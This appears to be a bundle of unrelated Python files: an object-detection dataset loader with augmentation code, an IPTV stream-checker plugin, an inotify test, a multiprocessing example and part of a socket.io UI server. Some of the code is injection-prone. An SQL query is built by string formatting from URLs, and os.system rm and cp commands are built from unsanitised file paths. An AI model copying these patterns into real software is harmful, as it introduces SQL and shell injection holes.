def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
l = self.labels[i] # label
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
assert nf > 0, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = None
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1] # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0] # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 2) & (h > 2) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 20)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
dotpy.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tools
import time
import re
import db
import threading
class Source (object) :
def __init__ (self):
self.T = tools.Tools()
self.now = int(time.time() * 1000)
def getSource (self) :
sourcePath = './plugins/dotpy_source'
with open(sourcePath, 'r') as f:
lines = f.readlines()
total = len(lines)
threads = []
for i in range(0, total):
line = lines[i].strip('\n')
item = line.split(',', 1)
thread = threading.Thread(target = self.detectData, args = (item[0], item[1], ), daemon = True)
thread.start()
threads.append(thread)
for t in threads:
t.join()
def detectData (self, title, url) :
info = self.T.fmtTitle(title)
netstat = self.T.chkPlayable(url)
if netstat > 0 :
cros = 1 if self.T.chkCros(url) else 0
data = {
'title' : str(info['id']) if info['id'] != '' else str(info['title']),
'url' : str(url),
'quality': str(info['quality']),
'delay' : netstat,
'level' : info['level'],
'cros' : cros,
'online' : 1,
'udTime' : self.now,
}
self.addData(data)
print('Checking[ %s ]: %s' % (str(info['id']) + str(info['title']), url))
else :
pass # MAYBE later :P
def addData (self, data) :
DB = db.DataBase()
sql = "SELECT * FROM %s WHERE url = '%s'" % (DB.table, data['url'])
result = DB.query(sql)
if len(result) == 0 :
data['enable'] = 1
DB.insert(data)
else :
id = result[0][0]
DB.edit(id, data)
|
pollinotify_test.py
|
'''
Created on 30 Jun 2014
@author: julianporter
'''
import random
import unittest
import multiprocessing
import collections
import tempfile
import time
import os
import sys
from .actions import EventGenerator, EventObserver
class TestInotify(unittest.TestCase):
def __init__(self,methodName='runTest',nTests=10):
super(TestInotify,self).__init__(methodName)
self.nTests=nTests
def setUp(self):
self.duration=random.randint(2,10)
self.path=os.path.join(tempfile.gettempdir(),'inotify')
try:
os.mkdir(self.path)
except:
pass
srcE, self.dstE = multiprocessing.Pipe()
srcO, self.dstO = multiprocessing.Pipe()
observerBarrier=multiprocessing.Semaphore()
sourceBarrier=multiprocessing.Semaphore()
self.observer=EventObserver(observerBarrier,sourceBarrier,srcO,path=self.path)
self.source=EventGenerator(observerBarrier,sourceBarrier,srcE,self.duration,path=self.path)
self.source.init()
self.observer.init()
self.observerTask=multiprocessing.Process(target=self.observer)
self.sourceTask=multiprocessing.Process(target=self.source)
self.observerTask.start()
self.sourceTask.start()
self.wait()
self.events=collections.defaultdict(lambda : 0)
self.events.update(self.dstE.recv())
self.observations=collections.defaultdict(lambda : 0)
self.observations.update(self.dstO.recv())
self.dstE.close()
self.dstO.close()
def tearDown(self):
self.observer.shutdown()
self.source.shutdown()
def wait(self):
for _ in range(self.duration):
print('.', end='')
sys.stdout.flush()
time.sleep(1)
def test_Create(self):
self.assertEqual(self.observations['Create'],self.events['WRITE'])
def test_Read(self):
self.assertEqual(self.observations['CloseOther'],self.events['READ'])
def test_Write(self):
self.assertEqual(self.observations['CloseWrite'],self.events['WRITE']+self.events['TOUCH']+self.events['MODIFY'])
def test_Change(self):
self.assertEqual(self.observations['Modify'],self.events['WRITE']+self.events['MODIFY'])
def test_Delete(self):
self.assertEqual(self.observations['Delete'], self.events['DELETE'])
def test_Move(self):
self.assertEqual(self.observations['MoveFrom'],self.events['MOVE'])
self.assertEqual(self.observations['MoveTo'],self.events['MOVE'])
def test_Open(self):
self.assertEqual(self.observations['Open'],self.events['READ']+self.events['WRITE']+self.events['TOUCH']+self.events['MODIFY'])
def teardown_module():
pass
if __name__=='__main__':
unittest.main(exit=False)
|
Sample_MultiProcess.py
|
import multiprocessing as mp
from multiprocessing import Process, Pipe
import time
class InputDataClass:
input_data_1 = 0
input_data_2 = 0
def __init__(self, in1, in2):
self.input_data_1 = in1
self.input_data_2 = in2
class OutputDataClass:
output_data_1 = 0
output_data_2 = 0
def print(self):
print("output_data_1: " + str(self.output_data_1) + ", output_data_2:" + str(self.output_data_2))
class ProcessClass:
@staticmethod
def process(conn, input_data):
output = OutputDataClass()
output.output_data_1 = input_data.input_data_1
output.output_data_2 = input_data.input_data_2 ** 2
# time.sleep(output.output_data_1 ) # Uncomment to see waiting process
# send the output
conn.send(output)
# close
conn.close()
def main():
n_process = 10 # mp.cpu_count() - 1 #
list_conn_out = []
list_process = []
for i in range(n_process):
# Create input data
input_data = InputDataClass(i, i)
# Create pipe for each subprocess to receive output data
conn_out, conn_in = Pipe(False)
# Subprocess: The conn_in is given to send the output data from subprocess.
p = Process(target=ProcessClass.process, args=(conn_in, input_data))
p.start()
# Parent process doesn't use the conn_in so close it.
conn_in.close()
# Append the process in order to join later
list_process.append(p)
# Append the connection for output
list_conn_out.append(conn_out)
# Wait all output data. Check them every *duration* second.
time_out = 0.01
duration = 1.0
while 1:
n_ready = len(mp.connection.wait(list_conn_out, time_out))
print(str(n_ready) + " of " + str(n_process) + " processes finished.")
if n_ready == n_process:
# Subprocesses can join here.
break
time.sleep(duration)
# Receive output data
list_output = []
for i in range(n_process):
# Receive and close
output_data = list_conn_out[i].recv()
list_conn_out[i].close()
# Append the output
list_output.append(output_data)
output_data.print()
if __name__ == "__main__":
main()
|
ui_context.py
|
import ravestate as rs
import ravestate_rawio as rawio
import ravestate_nlp as nlp
import ravestate_phrases_basic_en as lang
import ravestate_verbaliser as verbaliser
from .ui_model import UIActivationModel, UISpikeModel
from .session import SessionClient
from typing import Any, Tuple, List, Union, Dict, Optional, Callable
import socketio
import flask
import urllib.parse
from threading import Thread, Lock, Event
from collections import defaultdict
from reggol import get_logger
logger = get_logger(__name__)
RAVEBOARD = "raveboard"
PORT_CONFIG_KEY = "port"
URL_PREFIX_KEY = "host"
SESSION_DB_KEY = "session_db"
URL_ANNOUNCE_KEY = "announce"
GREETING_KEY = "greet"
SESSION_TIMEOUT_KEY = "timeout"
SSL_CRT_AND_KEY_CONTEXT = "ssl_context"
ANNOUNCE_URL_YES = "yes"
GREET_ON_CONNECT = "connect"
RAVEBOARD_CONFIG = {
PORT_CONFIG_KEY: 42424,
URL_PREFIX_KEY: "http://localhost",
SESSION_DB_KEY: "",
URL_ANNOUNCE_KEY: ANNOUNCE_URL_YES,
GREETING_KEY: "",
SESSION_TIMEOUT_KEY: 40,
SSL_CRT_AND_KEY_CONTEXT: []
}
class UIContext(rs.Context):
def __init__(self, *arguments, runtime_overrides: List[Tuple[str, str, Any]] = None, skip_http_serve=False):
self.msgs_lock = Lock()
self.sio = socketio.Server(cors_allowed_origins="*", async_mode="threading")
self.next_id_for_object = defaultdict(int)
self.ui_objects: Dict[Union[rs.Spike, rs.Activation], Union[UISpikeModel, UIActivationModel]] = dict()
self.sio.on("connect", self._authorize_client)
self.session_client: Optional[SessionClient] = None
self.config_parsed = Event()
self.new_connection: Callable = lambda: None
self.new_connection_called: bool = False
super().__init__(*arguments, runtime_overrides=runtime_overrides)
if not skip_http_serve:
Thread(target=self.ui_serve_events_async).start()
def ui_serve_events_async(self):
app = flask.Flask(__name__, static_folder="dist/ravestate")
app.wsgi_app = socketio.Middleware(self.sio, app.wsgi_app)
ssl_context = self.conf(mod=RAVEBOARD, key=SSL_CRT_AND_KEY_CONTEXT)
if not ssl_context or len(ssl_context) != 2:
ssl_context = None
else:
ssl_context = tuple(ssl_context)
app.run(
host='0.0.0.0',
port=self.conf(mod=RAVEBOARD, key=PORT_CONFIG_KEY),
threaded=True,
ssl_context=ssl_context)
def _authorize_client(self, _, msg):
self.config_parsed.wait()
if self.session_client:
query = urllib.parse.parse_qs(msg['QUERY_STRING'])
if not query or 'token' not in query:
return False
token = query['token']
if len(token) < 1:
return False
if not self.session_client.authorized(token[0]):
return False
else:
# Not a managed session, no auth required
pass
if not self.new_connection_called:
self.new_connection()
self.new_connection_called = True
return True
def _load_modules(self, modules: List[str]):
super()._load_modules(modules)
with rs.Module(name=RAVEBOARD, config=RAVEBOARD_CONFIG, depends=(rawio.mod, verbaliser.mod, nlp.mod)) as mod:
sig_last_output = rs.Signal(name="last-output")
sig_heartbeat = rs.Signal(name="heartbeat")
prop_connections = rs.Property(name="connections")
